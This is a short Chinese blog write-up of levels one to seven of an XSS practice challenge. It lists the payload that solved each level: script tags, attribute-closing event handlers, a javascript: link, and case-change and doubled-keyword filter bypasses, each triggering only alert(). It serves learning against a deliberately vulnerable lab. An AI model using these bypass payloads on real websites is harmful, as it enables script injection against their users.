XSS闯关记录

其他 2020-07-24 11:32:16 阅读次数: 0

文章目录

第一关
第二关--闭合
第三关
第四关太简单了
第五关--过滤了on关键字
第六关--大小写绕过懒的截图
第七关--补充撮合

第一关

在这里插入图片描述
没有任何的过滤，直接得到name=<script>alert()</script>

第二关–闭合

发现是在Value里面很简单闭合前面和后面即可，我的一种方案是
"onload="alert();""
在这里插入图片描述

第三关

在这里插入图片描述
发现没啥用处,最后尝试出'onload="alert(1)

第四关太简单了

在这里插入图片描述

" onfocus="alert(/xss/)

第五关–过滤了on关键字

考虑用a标签,<a href="javascript:alert()">666</a>
在这里插入图片描述

第六关–大小写绕过懒的截图

" ONmouseover="alert(/xss/)

第七关–补充撮合

在这里插入图片描述
" oonnmouseover="alert()

猜你喜欢

转载自blog.csdn.net/solitudi/article/details/107481228

XSS闯关记录

【xss-labs】闯关记录16~18

【xss-labs】闯关记录1~9

【xss-labs】闯关记录10~15

自用XSS闯关攻略

xss练习闯关

xss-tour闯关

XSS挑战之旅闯关笔记

XSS-Lab闯关笔记

i春秋 XSS闯关 wp

the python challenge闯关记录

xctf闯关记录

XSS闯关之第四关

XSS闯关之第二关

XSS闯关之第五关

对一次xss闯关的体会

xss-labs-游戏闯关3

DWVA-XSS部分练手闯关

XSS闯关游戏准备阶段及XSS构造方法

XSS闯关之第一关

XSS闯关之第三关

XSS闯关——第七关：level7

XSS闯关——第六关：level6

XSS闯关——第五关：level5

XSS闯关——第四关：level4

Xss-labs-游戏闯关1-2

xss-labs-游戏闯关8-10

xss-tour闯关level1-9

[第二章 web进阶]XSS闯关

xss bypass 学习记录

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

周排行

循环神经网络（rnn）讲解

Tigao教程四：单独的关节运动

金蝶K3WISE15.0-注册套打教程

如何在Mac上配置Kubernetes

Android应用结束自身进程的方法

SpringMVC学习十三拦截器栈

中国驻洛杉矶总领馆举行新春招待会

HttpClient get post 发送

11 - three.js 笔记 - 绘制三维字体模型

Mysql递归获取某个父节点下面的所有子节点和子节点上的所有父节点

每日归档

更多

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)